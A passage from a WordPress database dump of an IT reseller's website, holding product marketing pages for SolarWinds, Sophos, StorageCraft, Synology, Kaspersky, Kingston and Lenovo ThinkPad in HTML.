templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Virtualization Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2467\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Virtualization-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nVirtual machine monitor designed to optimize performance and fix issues in minutes.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Predictive Recommendations</li>\r\n 	<li>VM Sprawl Control</li>\r\n 	<li>Comprehensive virtualization management</li>\r\n 	<li>Powerful capacity planning tools</li>\r\n 	<li>Manage across on-premise, hybrid, and cloud</li>\r\n 	<li>Visibility across the application stack</li>\r\n</ul>\r\n3.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2468\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n4. <strong>Server Configuration Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2469\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Configuration-Monitor.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nServer configuration and change monitoring tool that\'s built to be easy to use.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Track system and application changes</li>\r\n 	<li>Compare configuration changes over time</li>\r\n 	<li>Correlate configuration changes to performance</li>\r\n 	<li>Asset inventory</li>\r\n 	<li>Orion Platform integration</li>\r\n</ul>\r\n5.Â <strong>Application Performance Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2470\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Application-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nExtending Server &amp; Application Monitor with in-depth performance monitoring of your custom applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor your custom .NET applications running on Microsoft IIS</li>\r\n 	<li>Integrated with Server &amp; Application Monitor</li>\r\n 	<li>Response Time Heat Map</li>\r\n 	<li>Transaction Performance Monitoring</li>\r\n 	<li>Distributed Transaction Tracing</li>\r\n 	<li>Trace Details</li>\r\n</ul>\r\n6.Â <strong>Web Performance Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2471\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Performance-Monitor.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nWebsite monitoring software built for comprehensive web and SaaS application performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Complete performance monitoring</li>\r\n 	<li>Continuous synthetic transaction monitoring</li>\r\n 	<li>Detailed load-time metrics</li>\r\n 	<li>Monitor from multiple locations</li>\r\n 	<li>Browser-based transaction recorder</li>\r\n 	<li>Transaction recording</li>\r\n</ul>\r\n7.Â <strong>SolarWinds Backup</strong>\r\n\r\n<img class=\"alignnone wp-image-2472\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SolarWinds-Backup.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nServer backup software designed to be modern and reliable, without the cost and complexity.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Unified, cloud-based backup service for physical and virtual servers</li>\r\n 	<li>Robust and reliable enough to handle even large machines and applications</li>\r\n 	<li>Fast backup and rapid restore with built-in compression and deduplication</li>\r\n 	<li>Simple, at-a-glance status dashboard eliminates manual checking</li>\r\n 	<li>Global, purpose-built, private cloud included</li>\r\n 	<li>Low TCO with no hidden costs</li>\r\n</ul>\r\n<h3>DATABASE MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2473\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor-1.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Storage Resource Monitor</strong>\r\n\r\n<img class=\"alignnone wp-image-2474\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor-1.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n<h3>IT SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Access Rights Manager</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2475\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Access-Rights-Manager.png\" alt=\"\" width=\"378\" height=\"236\" />\r\n\r\nManage and audit access rights across your IT infrastructure.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitoring of Active Directory</li>\r\n 	<li>Auditing for Windows File Share</li>\r\n 	<li>Monitoring of Microsoft Exchange</li>\r\n 	<li>SharePoint access monitoring and management</li>\r\n 	<li>User provisioning and management</li>\r\n 	<li>User permissions analysis</li>\r\n</ul>\r\n2.Â <strong>Threat Monitor - IT Ops Edition</strong>\r\n\r\n<img class=\"alignnone wp-image-2476\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Threat-Monitor-IT-Ops-Edition.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nMonitor, respond, and report security threats in near real time.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Continuously updated threat intelligence</li>\r\n 	<li>Security Information and Event Manager (SIEM)</li>\r\n 	<li>Log correlation</li>\r\n 	<li>Log event archive</li>\r\n 	<li>Network and Host Intrusion Detection System</li>\r\n 	<li>Highly indexed log search capabilities</li>\r\n</ul>\r\n3.Â <strong>Log &amp; Event Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2477\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Log-Event-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nSIEM tools make it easier to use event logs for security, compliance, and troubleshooting.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Integrated compliance reporting tools</li>\r\n 	<li>Event-time correlation of security events</li>\r\n 	<li>Automated threat remediation</li>\r\n 	<li>Advanced search and forensic analysis</li>\r\n 	<li>File integrity monitoring</li>\r\n 	<li>USB device monitoring</li>\r\n</ul>\r\n4.Â <strong>Serv-U File Transfer Protocol Server</strong>\r\n\r\n<img class=\"alignnone wp-image-2478\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-File-Transfer-Protocol-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nSimple, affordable, easy-to-use FTP server software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>File transfer using FTP and FTPS</li>\r\n 	<li>Quick and easy file transfers from the web and mobile devices</li>\r\n 	<li>Transfer multiple and large files easily</li>\r\n 	<li>Simple file transfer administration and management</li>\r\n 	<li>Secure gateway helps avoid data at rest in DMZ networks</li>\r\n 	<li>Easily manage file transfer settings and permissions</li>\r\n</ul>\r\n5.Â <strong>Patch Manager</strong>\r\n\r\n<img class=\"alignnone wp-image-2479\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Patch-Manager.png\" alt=\"\" width=\"378\" height=\"286\" />\r\n\r\nPatch management software designed for quickly addressing software vulnerabilities.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Microsoft WSUS patch management</li>\r\n 	<li>Integrations with SCCM</li>\r\n 	<li>Vulnerability management</li>\r\n 	<li>Pre-built/pre-tested packages</li>\r\n 	<li>Patch compliance reports</li>\r\n 	<li>Patch status dashboard</li>\r\n</ul>\r\n6.Â <strong>Serv-U Managed File Transfer Server</strong>\r\n\r\n<img class=\"alignnone wp-image-2480\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-Managed-File-Transfer-Server.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nEnhance security and control over file transfers in and outside your organization.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Reliable FTP server software for secure file transfer</li>\r\n 	<li>Ad hoc file sharing to easily send and request files</li>\r\n 	<li>Anywhere, anytime file transfer from web and mobile devices</li>\r\n 	<li>Upload and download large files quickly and easily</li>\r\n 	<li>Centralized file transfer management and automation</li>\r\n 	<li>Maintain regulatory compliance</li>\r\n</ul>\r\n<h3>IT HELP DESK</h3>\r\n<ol>\r\n 	<li><strong>Web Help Desk</strong></li>\r\n</ol>\r\n<img class=\"alignnone wp-image-2481\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Web-Help-Desk.png\" alt=\"\" width=\"382\" height=\"239\" />\r\n\r\nAffordable Help Desk Ticketing and Asset Management Software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automate ticketing management</li>\r\n 	<li>Centralize your knowledge management</li>\r\n 	<li>Meet your SLAs</li>\r\n 	<li>Relational ticket association to simplify project and task management</li>\r\n 	<li>Native integration with Active Directory and LDAP</li>\r\n 	<li>Measure customer satisfaction</li>\r\n</ul>\r\n2.Â <strong>Dameware Remote Support</strong>\r\n\r\n<img class=\"alignnone wp-image-2482\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Remote-Support.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nRemote control and systems management tools in one easy-to-use package.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Fast and secure remote control</li>\r\n 	<li>Anywhere, anytime remote assistance</li>\r\n 	<li>Simplify Windows administration</li>\r\n 	<li>Built-in remote admin tools</li>\r\n 	<li>Deliver remote support from iOS and Android devices</li>\r\n 	<li>Remotely manage Active Directory environments</li>\r\n</ul>\r\n3.Â <strong>Dameware Mini Remote Control</strong>\r\n\r\n<img class=\"alignnone wp-image-2483\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Mini-Remote-Control.png\" alt=\"\" width=\"383\" height=\"239\" />\r\n\r\nAffordable remote control software for all your customer support and help desk needs.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-platform desktop sharing and remote control</li>\r\n 	<li>Remote access to sleeping and powered-off computers</li>\r\n 	<li>Multi-factor authentication</li>\r\n 	<li>Flexible user access control</li>\r\n 	<li>Customize and automatically deploy remote control agents</li>\r\n 	<li>Remote session tools and utilities</li>\r\n</ul>\r\n4.Â <strong>Mobile Admin</strong>\r\n\r\n<img class=\"alignnone wp-image-2484\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mobile-Admin.jpg\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nGet help simplifying IT administration and management from your mobile device.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>SolarWinds OrionÂ® Platform integration</li>\r\n 	<li>Active Directory</li>\r\n 	<li>Virtualization management</li>\r\n 	<li>Email server management</li>\r\n 	<li>Backup management</li>\r\n 	<li>Remote access</li>\r\n</ul>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Solarwinds','','publish','closed','closed','','solarwinds','','','2018-12-18 22:59:10','2018-12-18 14:59:10','',0,'https://bintara.com.my/?page_id=1597',0,'page','',0),(1598,1,'2018-12-11 15:50:34','2018-12-11 07:50:34','<h3 class=\"main-heading-content-component main-heading-content-component-c1aa2065-68a5-43f7-a2eb-801583b2fda8 \">Securing Your Industry</h3>\r\nIT security products have become as complex as the networks theyâ€™re trying to secure. At Sophos we know that the solution to complexity is not more complexity. We tackle security challenges with clarity and confidence, knowing that simple security is better security.\r\n<h4>Education</h4>\r\nProtect your faculty and staff, secure educational assets like student records and research, support institutional compliance activities and meet internal policy requirements.\r\n<h4>Healthcare</h4>\r\nSecure highly sensitive patient data with advanced security solutions, and support your activities to comply with stringent industry regulations and institutional policy.\r\n<h4>Retail</h4>\r\nSecurity breaches can destroy customer confidence. Bolster your defenses against malware, remote threats, data thefts and support your efforts to comply with industry regulations.\r\n<h4>Finance &amp; Banking</h4>\r\nSecure your financial transactions, customer PII, financial records, intellectual property and support your efforts to comply with stringent regulations and performance requirements.\r\n<h4>Government</h4>\r\nStay protected against modern day cyber threats that try to compromise sensitive data and threaten national security; secure government interests and citizen data.\r\n<h4>Public Sector</h4>\r\nReduce the cost of IT security without compromising on the quality of protection with market-leading technology that is vastly experienced in securing Public Sector organizations.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Sophos','','publish','closed','closed','','sophos','','','2018-12-14 14:52:06','2018-12-14 06:52:06','',0,'https://bintara.com.my/?page_id=1598',0,'page','',0),(1599,1,'2018-12-11 15:57:08','2018-12-11 07:57:08','<div class=\"header-banner--slider slick-initialized slick-slider\" data-slick=\"{&quot;adaptiveHeight&quot;: &quot;true&quot;}\">\r\n<div class=\"slick-list draggable\">\r\n<div class=\"slick-track\">\r\n<div class=\"slick-slide slick-current slick-active\" data-slick-index=\"0\" aria-hidden=\"false\">\r\n<div class=\"slide\">\r\n<div class=\"bg-image paragraph paragraph--type--compound-header-banner paragraph--view-mode--default text-color-dark\">\r\n<div class=\"paragraph-content\">\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n<h3>Gain an Edge with StorageCraft</h3>\r\nYou stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtect<sup>Â®</sup>Â is considered the best recovery solution in the market.\r\n<h3><img class=\"alignnone size-full wp-image-2167\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ShadowProtect-Tab1_34266093.jpg\" alt=\"\" width=\"770\" height=\"390\" /></h3>\r\n<h3>ShadowProtect</h3>\r\nWith ShadowProtect, meet or beat your recovery time and recovery point objectives (RTOs and RPOs). Recover files and folders in minutes. Restore failed servers. Use patented VirtualBoot technology to instantly boot a backup image into a virtual machine.\r\n<h4>THE BEST IN RELIABLE DATA PROTECTION AND DISASTER RECOVERY</h4>\r\nPhysical or virtual, Windows or Linux, you won\'t find a faster, more reliable way to recover systems and data.\r\n<h4 class=\"field field--name-field-heading field--type-string field--label-hidden field-item\">One Solution for Your Data Protection Needs</h4>\r\n<div class=\"field field--name-field-textarea field--type-text-long field--label-hidden field-item\">\r\n\r\nLike disasters, IT environments are anything but standard. Thatâ€™s why businesses need a single cross-platform solution that protects a mixed, hybrid environment. ShadowProtect<sup>Â®</sup>Â backup and disaster recovery software ensures on-prem business systems and data are fully protected and always available.\r\n<h4>DISASTER RECOVERY</h4>\r\n<h4>ENSURE BUSINESS CONTINUES, NO MATTER WHAT HAPPENS</h4>\r\nPrepare your organization for the worst that Mother Nature or human nature can throw at it. When a site-wide disaster hits, be ready to recover with the help of our disaster recovery cloud.\r\n<h4><img class=\"alignnone wp-image-2165 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Cloud-Services-Component-560x373_0-300x171.jpeg\" alt=\"\" width=\"300\" height=\"171\" /></h4>\r\n<h4>Keep Systems and Data Always Safe and Available</h4>\r\nBusinesses canâ€™t be without their critical data for long. Yet, a large-scale disaster can readily disrupt systems and make doing business impossible. Building out your own data center for disaster recovery is costly. But StorageCraft Cloud Services<sup>â„¢</sup>lets you control costs by letting you customize services to fit business needs and budget. Plus youâ€™ll never be surprised with extra fees at the time of recovery. When the worst happens, know that data is safe, recoverable, and available.\r\n\r\n<img class=\"alignnone wp-image-2166 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Disaster-Recovery-Component-1-300x171.jpg\" alt=\"\" width=\"300\" height=\"171\" />\r\n<h4>With the Right Disaster Recovery Cloud, a Business Can Survive Anything</h4>\r\nStorageCraft Cloud Services stores copies of your backups in our cloud, and during a major disaster, you can quickly get critical operations running again. Recover data, virtualize machines, or even fail over an entire site and network in minutes.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','StorageCraft','','publish','closed','closed','','storagecraft','','','2018-12-14 12:57:40','2018-12-14 04:57:40','',0,'https://bintara.com.my/?page_id=1599',0,'page','',0),(1600,1,'2018-12-11 15:51:20','2018-12-11 07:51:20','<h3>Synology</h3>\r\n<h3>Tiered data protection for business continuity</h3>\r\nData is the lifeblood of business. When accidents or hardware failures result in data loss, productivity drops and your business suffers. Traditional backup strategies present challenges like long recovery times or extraneous storage consumption. Your business needs a smart backup strategy to effectively protect against all threats and keep operations running smoothly.\r\n<div class=\"container-960 center\">\r\n<h3>Accidents do happen</h3>\r\nThreats come in many shapes and sizes. A sound backup strategy requires contingency plans for a variety of incidents.\r\n\r\n</div>\r\n<div class=\"pure-g autopad-60-h\">\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_01.png\" srcset=\"img/solution/nas_protection/icon_01@2x.png 2x\" alt=\"\" />\r\n<h4>Deleted data</h4>\r\nEmployees delete important data intentionally or accidentally.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_02.png\" srcset=\"img/solution/nas_protection/icon_02@2x.png 2x\" alt=\"\" />\r\n<h4>Malicious attacks</h4>\r\nSystems succumb to hacking or ransomware.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_03.png\" srcset=\"img/solution/nas_protection/icon_03@2x.png 2x\" alt=\"\" />\r\n<h4>Hardware failure</h4>\r\nMultiple hard drives might crash at the same time resulting in data loss.\r\n\r\n</div>\r\n<div class=\"pure-u-1-1 pure-u-lg-1-2 pure-u-xl-1-4\">\r\n\r\n<img src=\"https://www.synology.com/img/solution/nas_protection/icon_04.png\" srcset=\"img/solution/nas_protection/icon_04@2x.png 2x\" alt=\"\" />\r\n<h4>Natural disaster</h4>\r\nData centers encounter fires, floods, or other disasters that cause downtime.\r\n\r\n</div>\r\n<h3>Private and public clouds, perfectly united</h3>\r\nSynology C2 Backup offers a highly-integrated and cost-effective cloud backup solution for Synology NAS. Keep backups offsite, go back in time with file versioning, and rest easy knowing data is encrypted â€” all without worrying about surprise fees.\r\n\r\n<img class=\"\" src=\"https://www.synology.com/img/solution/nas_protection/Private_and_public_clouds_ui.png\" srcset=\"img/solution/nas_protection/Private_and_public_clouds_ui@2x.png 2x\" alt=\"\" width=\"372\" height=\"222\" />\r\n\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Synology','','publish','closed','closed','','synology','','','2018-12-12 16:57:14','2018-12-12 08:57:14','',0,'https://bintara.com.my/?page_id=1600',0,'page','',0),(1562,1,'2018-12-11 15:39:44','2018-12-11 07:39:44','','Motorola','','inherit','closed','closed','','1550-revision-v1','','','2018-12-11 15:39:44','2018-12-11 07:39:44','',1550,'https://bintara.com.my/blog/2018/12/11/1550-revision-v1/',0,'revision','',0),(1542,1,'2018-12-11 15:37:13','2018-12-11 07:37:13','','Juniper','','inherit','closed','closed','','1533-revision-v1','','','2018-12-11 15:37:13','2018-12-11 07:37:13','',1533,'https://bintara.com.my/blog/2018/12/11/1533-revision-v1/',0,'revision','',0),(1537,1,'2018-12-11 15:35:56','2018-12-11 07:35:56','','HPE','','inherit','closed','closed','','1529-revision-v1','','','2018-12-11 15:35:56','2018-12-11 07:35:56','',1529,'https://bintara.com.my/blog/2018/12/11/1529-revision-v1/',0,'revision','',0),(1538,1,'2018-12-11 15:36:08','2018-12-11 07:36:08','','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2018-12-11 15:36:08','2018-12-11 07:36:08','',1534,'https://bintara.com.my/blog/2018/12/11/1534-revision-v1/',0,'revision','',0),(1539,1,'2018-12-11 15:36:22','2018-12-11 07:36:22','','IBM','','inherit','closed','closed','','1530-revision-v1','','','2018-12-11 15:36:22','2018-12-11 07:36:22','',1530,'https://bintara.com.my/blog/2018/12/11/1530-revision-v1/',0,'revision','',0),(1540,1,'2018-12-11 15:36:36','2018-12-11 07:36:36','','Infocus','','inherit','closed','closed','','1531-revision-v1','','','2018-12-11 15:36:36','2018-12-11 07:36:36','',1531,'https://bintara.com.my/blog/2018/12/11/1531-revision-v1/',0,'revision','',0),(1541,1,'2018-12-11 15:36:49','2018-12-11 07:36:49','','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2018-12-11 15:36:49','2018-12-11 07:36:49','',1532,'https://bintara.com.my/blog/2018/12/11/1532-revision-v1/',0,'revision','',0),(1543,1,'2018-12-11 15:37:43','2018-12-11 07:37:43','<h3>Endpoint Security for Business</h3>\r\n<h3>SELECT</h3>\r\nWith more of your business operations going digital, you need to protect every server, laptop &amp; mobile device. In a single solution â€“ with one easy-to-use management console â€“ we deliver Next-Gen Security that helps you protect every endpoint your business runs.\r\n<ul>\r\n 	<li>Protects against the latest threats, including ransomware</li>\r\n 	<li>Hardens endpoints â€“ to reduce your exposure to cyberattacks</li>\r\n 	<li>Helps boost productivity â€“ via cloud-enabled usage controls</li>\r\n 	<li>Protects servers &amp; endpoints without damaging performance</li>\r\n 	<li>Secures diverse environments â€“ PC, Mac, Linux, iOS &amp; Android</li>\r\n 	<li>Simplifies security management â€“ with one unified console</li>\r\n</ul>\r\n<h4><img class=\"alignnone size-full wp-image-2281\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Performance &amp; multilayer protection</h4>\r\n<div>\r\n\r\nSecurity shouldnâ€™t slow you down. Thatâ€™s why our security has minimal impact on system performance â€“ and, if youâ€™re attacked, Automatic Rollback undoes most malicious actionsâ€¦ so users can keep on working.\r\n<h4><img class=\"alignnone size-full wp-image-2283\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select2.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Next-Gen protection technologies</h4>\r\n<div>\r\n\r\nDelivers world-class security â€“ including static &amp; dynamic Machine Learning technologies â€“ to help reduce your businessâ€™s attack surface and keep all your endpoints safeâ€¦ while reducing the need to download frequent updates.\r\n\r\n</div>\r\n<h4><img class=\"alignnone size-full wp-image-2284\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/KESB-Select3.png\" alt=\"\" width=\"293\" height=\"220\" /></h4>\r\n<h4 class=\"section-title\">Simplifies security management tasks</h4>\r\n<div>\r\n\r\nHelps you deploy security rapidly and with the minimum of fuss â€“ using any of our wide range of preconfigured scenarios. A single unified management console makes it easy to apply your chosen security policies to every endpoint in your business.\r\n<h3></h3>\r\n<h3>The smart choice for security</h3>\r\n<h4>Future-proof your endpoint security</h4>\r\nWeâ€™ve identified more advanced threats than any other security vendor â€“ and weâ€™re recognized for innovation. So, you get security that adapts to protect you from new threatsâ€¦ whether your IT is on-site or outsourced.\r\n<h4>Keep tight control of your costs</h4>\r\nWith multiple security technologies â€“ including Next-Gen â€“ in a single product, there are no hidden costs. One product â€“ with one license â€“ is all you need to buy to protect your endpoints.\r\n<h4>Benefit from integration</h4>\r\nAll our core technologies are developed in-house â€“ and every function is within one agent â€“ so you benefit from efficient, integrated protection.\r\n<h4>Security that wins more awardsâ€¦ does more to protect</h4>\r\nDonâ€™t just take our word for it. In recent years, our products have participated in more independent tests &amp; reviews â€“ and have achieved more first places than any other vendor.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Kaspersky','','publish','closed','closed','','kaspersky','','','2018-12-17 12:37:40','2018-12-17 04:37:40','',0,'https://bintara.com.my/?page_id=1543',0,'page','',0),(1544,1,'2018-12-11 15:38:09','2018-12-11 07:38:09','<h3>Reliable SD cards, SSD drives, memory modules and USB flash drives for consumers, businesses, enterprises and system builders offered by <em>Kingston</em>.</h3>\r\n<h3>Memory</h3>\r\n<h4>Server Memory</h4>\r\nTrust Kingston for all your server memory needs. Our experts know how important it is to keep your business up and running with the ultra-reliable memory that you need and the service to guide you.\r\n<h4>Desktop/Notebook Memory</h4>\r\nQuality components. Rigorous testing. A lifetime warranty. Just three of the many reasons to choose Kingston memory for your desktop or notebook.\r\n\r\n&nbsp;\r\n<h3>Solid-State Drives</h3>\r\n<h4>Consumer</h4>\r\nRevive your computer with improved speed, performance and reliability over traditional hard drives.\r\n<h4>\r\nBusiness</h4>\r\nExtend the lifecycle and dramatically improve the performance of PCs for a lower TCO with SSDNow drives designed for business.\r\n<h4>\r\nEnterprise</h4>\r\nThese enterprise SSDs offer increased endurance and power-failure features to keep mission-critical environments up and running 24/7.\r\n<h4>System Builders</h4>\r\nHard drive replacements ideal for non-PC applications\r\n\r\n&nbsp;\r\n<h3>DataTraveler USB Drives</h3>\r\n<h4>Personal Drives</h4>\r\nDataTraveler Flash drives offer capacities up to 2TB and a wide variety of features. Store and transfer photos, music, videos and files with legendary Kingston reliability.\r\n<h4>\r\nEncrypted Drives</h4>\r\nDesigned to protect data that requires airtight security, these drives help you meet specific agency directives like TAA and FIPS compliance and are ideal for Government or Corporate use.\r\n\r\n&nbsp;\r\n<h3>Flash Cards</h3>\r\n<h4>Photo/Video (SD Cards)</h4>\r\nFrom everyday use to professional photo or video, these cards deliver exceptional speeds, huge capacities and legendary Kingston reliability.\r\n<h4>\r\nMobile Devices (microSD)</h4>\r\nReliable photo and video storage for phones, tablets, PDAs and more. Available in a full range of sizes and speeds with accessories to suit your needs.\r\n<h4>\r\nCard Readers</h4>\r\nKingston Card Readers quickly transfer all your data â€“ photos, videos, music etc.â€“ so you can wait less and do more. They support a wide variety of formats, including microSD, microSDHC, SD, SDHC, SDXC and CompactFlash.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Kingston','','publish','closed','closed','','kingston','','','2018-12-17 12:17:23','2018-12-17 04:17:23','',0,'https://bintara.com.my/?page_id=1544',0,'page','',0),(1545,1,'2018-12-11 15:38:30','2018-12-11 07:38:30','<h3 class=\"bar_3-heading\">THINKPAD</h3>\r\n<h3>PREMIUM PERFORMANCE,\r\nLEGENDARY RELIABILITY</h3>\r\nThere\'s a reason ThinkPad reliability is legendary and it starts with military-spec testing against extremes â€” our laptops more than endure the rigors of everyday life. Factor in the award-winning precision keyboard with its renowned red TrackPointÂ®, multitouch touchpad, ergonomic keys, and convenient multimedia buttons and we\'ve got comfort covered too.\r\n\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad X Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Thin &amp; Light Laptops</strong>\r\nUltralight, with performance for extreme mobility &amp; epic battery life.</p>\r\n<img class=\"alignnone wp-image-2252 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hero-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>First-class experience</strong></p>\r\n<p class=\"heroSectionContent-Quote\">Smaller footprints and epic battery life make X Series the business travelerâ€™s trusted companion. Their craftsmanship, versatility and robust security features ensure they\'re every professional\'s preference.</p>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad T Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Premium Laptops</strong>\r\nPerformance and durability in our flagship laptop series.</p>\r\n<img class=\"alignnone wp-image-2253 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-laptop-think-t-series-hero2-300x198.png\" alt=\"\" width=\"300\" height=\"198\" />\r\n<p class=\"heroSectionContent-Quote\"><strong>We\'ve got your back</strong></p>\r\n<p class=\"heroSectionContent-text\">Built to perform and engineered to endure, our flagship laptops have you covered in the office, out in the field, and everywhere in between. Productivity-rich features like epic battery life, blazing-fast USB â€“C ThunderboltÂ® ports, and powerful processing keep you up and running.</p>\r\n&nbsp;\r\n<div 